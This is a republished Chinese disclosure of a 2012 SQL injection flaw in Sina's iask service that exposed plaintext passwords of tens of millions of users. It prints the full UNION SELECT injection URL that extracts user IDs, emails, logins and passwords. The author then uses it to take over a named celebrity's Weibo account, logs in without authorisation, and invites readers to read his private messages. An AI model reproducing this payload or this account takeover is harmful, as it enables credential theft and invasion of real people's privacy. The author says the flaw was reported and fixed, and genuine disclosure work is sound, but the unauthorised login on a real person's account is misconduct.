2012年新浪微博用户密码明文泄露漏洞

安全 数据安全
新浪网iask存在sql注射漏洞,利用漏洞可读取iask数据库内内容。包括明文密码在内的7000多W新浪用户信息。

相关厂商:www.sina.com

作者:http://weibo.com/evilniang

发现时间:2012-1-1

漏洞类型:sql注射

危害等级:高

漏洞状态:已修复

首先申明:该漏洞发现后本人已联系新浪官方修复漏洞,目前漏洞以修补。文章内容公布,仅供参考学习。 新浪网iask存在sql注射漏洞,利用漏洞可读取iask数据库内内容。包括明文密码在内的7000多W新浪用户信息。

漏洞存在点:

http://iask.sina.com.cn//prize/event_getorderlist.php?id=999999.9

漏洞利用方式: http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+

UNION+ALL+SELECT+%28SELECT+

concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+

%60whatis%60.user+

where+uid=1303977362+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--

这里我们通过构造数据库查询语句获得用户uid=1303977362的uid、login、email、passwd等信息。

通过修改字段还可以获取其他信息 。 直接举个例子比如我们通过新浪微波查找到刘谦,点击他的个人资料。我们可以再浏览器地址栏处看到刘谦的uid(新浪用户数字id),此处uid为12715428867

直接构造地址:

http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+

UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,

0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+

LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--

直接获得刘谦的账号和密码

这里账号是luchenmagic密码为2lo*****(保密) 尝试登陆

成功登陆。刘谦微薄。这里你可以看看你的偶像的各种私信,聊天记录之类的。 接下来的事情你可以自由发挥了。但是对于一个黑客而言,这只不过是一个开始而已(这里我并无恶意,拿刘谦的账号来测试只是为了致敬,希望有机会能够见证奇迹!)。

后话:

1.2011年年底的csdn、天涯等用户库的泄露只不过是冰山一脚。

2.新浪在csdn、天涯等用户库泄露后申称新浪数据库并没有泄露,而且密码是密文保存。这里要提出质疑了,数据库密码明明是明文保存。至少iask中大部分用户是明文保存密码(部分用户查不到密码)。至于用户信息是否泄露,这个不用说了把?

3.网络泄密涉及到太多。不管是普通网民,还是明星名人,都被牵涉进来。这里测试不少明星,基本上都能通过微薄获取他们的私人信息,甚至登陆他们的msn。(香港爆料杂志来找我把。开个玩笑。。。)

4.这个漏洞发现后我便通知了新浪官方,新浪在漏洞反馈和应急处理这方面做的不够快。收到漏洞后连给我回个邮件或者表示感谢都没有。(我是无私奉献白帽子,被活雷锋了。)

5.祝新年快乐。

 

【编辑推荐】

  1. 神秘黑客再袭FBI合作网站 或将发起更多袭击
  2. 黑客相互结盟锁定世界各国政府网站
责任编辑:王文文 来源: 游侠安全网
相关推荐

2012-01-05 10:38:32

2013-08-20 10:46:29

2011-12-26 12:05:43

密码加密新浪微博

2012-07-12 15:00:26

漏洞账号错乱新浪微博

2014-11-04 10:30:32

新浪微博可登录任意账户

2020-12-01 15:35:06

Web安全明文密码漏洞

2014-12-25 18:10:05

2013-07-10 14:15:38

php新浪微博

2012-01-05 10:25:04

2011-12-08 16:31:43

新浪微博开放平台

2011-12-08 16:51:55

新浪微博开放平台

2013-07-01 18:34:47

个推案例新浪微博

2011-12-08 16:10:18

2015-01-21 15:28:16

Android源码新浪微博

2011-07-22 10:38:55

HTC新浪Facebook

2011-11-10 16:59:26

当当网安全漏洞用户资料

2012-04-05 11:24:51

2015-08-07 19:42:16

明文密码泄露搜房网后门

2015-09-24 18:08:50

微博架构架构演进架构

2016-03-17 16:00:51

新浪微博用户模型
点赞
收藏

51CTO技术栈公众号